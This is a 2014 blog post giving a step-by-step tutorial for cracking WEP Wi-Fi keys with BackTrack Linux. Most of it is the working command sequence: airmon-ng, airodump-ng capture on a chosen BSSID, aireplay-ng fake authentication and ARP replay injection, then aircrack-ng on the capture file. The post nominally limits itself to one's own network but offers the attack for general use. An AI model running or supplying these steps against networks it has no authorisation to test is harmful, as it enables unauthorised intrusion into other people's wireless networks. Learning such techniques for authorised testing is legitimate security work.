Saturday, 6 December 2014

WEP Wifi Hacking Tutorial

So you want to crack YOUR OWN wireless network for penetration testing purposes, or to hone your skills.

To be able to crack wep with backtrack (or any other distro for that matter) you'll need to have a wireless adapter that supports packet injection. Most don't. In that case you can buy an inexpensive usb adapter to get the job done just as well..

**//NetBooks I've Tested, Work Without Buying an Adapter\\**

ASUS 900A
ASUS 1005HA
ASUS 1005HAB
ASUS 900

If you think that your laptop might work just look it up on google. If not go and buy yourself and ALFA 1Watt adapter (AWUS036H) is the only one I've personally used but some other models work too.

Buy it here:
http://shop.ebay.com/i.html?LH_BIN=1&_nkw=AWUS036H&_fln=1&_sc=1&_sop=15&_ssov=1&_sticky=1&_trksid=p3286.c0.m282&_mPrRngCbx=1&_udlo=20&_udhi=
(listed for buy it now cheapest first, make sure you buy one within your own country otherwise shipping could take a month! lesson learned)

There are differnet adapter that are cheaper and work. But this model is arguable the best you can get with the higehest
in/out signal strength.

Now you'll need to download the BackTrack Linux Distro: http://www.backtrack-linux.org/downloads/
I suggest Back Track 4 Final (only use torrent if you know how) The latest version is told to be better but
as I have not tested it with this tutorial will keep with BT4F (backtrack 4 final)

Now you have your iso image, weather you know what that is or not you have it. You'll need to burn it to a dvd (not a cd)
Go download imgburn from http://www.imgburn.com/index.php?act=download

Go ahead and download which ever version you'd like from any mirror on the site.

Use imgburn to burn the image/iso file of backtrack to your dvdr.

Now you can boot your computer from the disc (if your using a netbook I'd suggest using unetbootin to put it on an sd card
or flash drive, get it here: http://unetbootin.sourceforge.net )

Many pc's and netbooks are setup so that they will boot of a cd, some however are set not to, in that case you'll need to
change some bios settings, Normally hitting ESC DEl or F2 will get you in. I'd suggest look into it if you've never messed with bios before)


Ok so.. you've got backtrack running at this point, now it may startup into the gui (graphic user interface) or it may just
be all text. If all you can see is text type the following without perentehsses on the screen and press enter "startx"

So, you see the gui.

Now you need to start the terminal (be sure your adapter is attached if your using one)
It looks like a small black box on the bottom tool bar.

Now type "airmon-ng"

This will show you all your network interfaces
from now on when I type "wlan0" you'll type whatever your interface is (prob wlan0 or wlan1)


Now type "airodump-ng wlan0"

This will show you a list of networks in the area, pick one YOURS using WEP.


Now press ctrl+c (control key + c key) This will stop the airodump-ng command.

Now copy down the channel and bssid of the network

run the following command, replace everything thats in parenthessis with your info " "

airodump-ng -c "channel number" -w wep --bssid "your bssid" wlan0

Now go ahead and open a new tab (under File in the terminal)

aireplay-ng -1 0 -a "bssid" wlan0

Now open another tab and run

aireplay-ng -3 -b "bssid" wlan0

Now just wait until Data reaches 10,000 or preferable 50,000

Depending on network activity this will go very rapidly or it may take a few minutes.

Now that you have enough or more Data (IVs) run this last command in a new tab

aircrack-ng wep-01.cap


And assuming all went well there you go! You just cracked your first wep key. Enjoy it and don't do anything I wouldn't do.

No comments:

Post a Comment